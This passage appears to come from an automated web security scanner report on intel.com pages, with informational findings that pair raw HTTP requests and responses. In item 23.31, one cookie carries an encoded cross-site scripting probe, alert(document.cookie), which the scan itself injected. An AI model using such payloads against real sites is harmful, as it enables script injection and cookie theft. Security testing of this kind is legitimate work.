Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 404 Not Found
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Expires: Sat, 05 Feb 2011 23:21:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 05 Feb 2011 23:21:06 GMT
Content-Length: 18367
Connection: close
Set-Cookie: ASPSESSIONIDCSRQSQAR=OAFLKMPAABHFKKFICLMGCMIN; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
   
<!-- IMPORTANT NOTE TO WEB AUTHORS UPDATING THIS PAGE: Do NOT use .inc files for the header a
...[SNIP]...

23.31. http://www.intel.com/p/IntelTheme/themes/dojolib/dojoc/productselector/ProductSelector.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /p/IntelTheme/themes/dojolib/dojoc/productselector/ProductSelector.html

Request

GET /p/IntelTheme/themes/dojolib/dojoc/productselector/ProductSelector.html HTTP/1.1
Host: www.intel.com
Proxy-Connection: keep-alive
Referer: http://www.intel.com/p/en_US/support?iid=hdr+support
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; s_cc=true; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A; s_lv=1296957106490; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3Aitcenter%3Aen_us%3Alibrary; s_sq=intelcorp%2Cintelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA%26intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/html
Last-Modified: Fri, 28 Jan 2011 02:06:18 GMT
Content-Language: en-US
Server: IA Web Server
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 01:55:17 GMT
Connection: close
Content-Length: 5234

<div class="outerDiv" dojoAttachPoint="containerNode"><!--Root starts-->
<table width=100% height="30px" style="height: 30px; width: 690px;padding-left:0px;">
   <tr>
       <td width="230" valign="bottom
...[SNIP]...

23.32. http://www.intel.com/pressroom/archive/releases/2010/20100125corp.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/archive/releases/2010/20100125corp.htm

Request

GET /pressroom/archive/releases/2010/20100125corp.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:21 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41207

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Plans Eight New Solar Installations in Four Stat
...[SNIP]...

23.33. http://www.intel.com/pressroom/execbios.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/execbios.htm

Request

GET /pressroom/execbios.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35376

<html>
<head>
<title>Intel Executive Bios - Corporate Officers</title>

<meta name="corporate_information_class" content="Press Relations">
<meta name="web_author_id" content="pdarling">
<meta
...[SNIP]...

23.34. http://www.intel.com/pressroom/jump/videobroadcast.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/jump/videobroadcast.htm

Request

GET /pressroom/jump/videobroadcast.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
ETag: "85ee109f4988c81:4305"
Last-Modified: Mon, 17 Mar 2008 16:11:56 GMT
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:22 GMT
Content-Length: 579
Connection: close

<meta http-equiv="refresh" content="1; url=http://www.thenewsmarket.com/intel/br/Login/LoginPreRegistration.aspx" />

<!-- WA code version: 1.1 -->
<script type="text/javascript" src="/scripts-incl
...[SNIP]...

23.35. http://www.intel.com/pressroom/kits/advancedtech/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/kits/advancedtech/index.htm

Request

GET /pressroom/kits/advancedtech/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37273

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>Intel Advanced Technology - Behind the Doodles</title>
...[SNIP]...

23.36. http://www.intel.com/pressroom/kits/chipmaking/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/kits/chipmaking/index.htm

Request

GET /pressroom/kits/chipmaking/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 68338

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>From Sand to Silicon: the Making of a Chip</title>
<!
...[SNIP]...

23.37. http://www.intel.com/pressroom/kits/embedded/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/kits/embedded/index.htm

Request

GET /pressroom/kits/embedded/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 54961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>PRESS KIT - Smarter Devices with Intel&reg; Embedded</
...[SNIP]...

23.38. http://www.intel.com/pressroom/kits/sot/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /pressroom/kits/sot/index.htm

Request

GET /pressroom/kits/sot/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Content-Type: text/html
Date: Sat, 05 Feb 2011 23:20:27 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37235

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<title>PRESS KIT - Intel: 'Sponsors of Tomorrow' Ad Campaign<
...[SNIP]...

23.39. http://www.intel.com/references/index.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intel.com
Path:   /references/index.htm

Request

GET /references/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
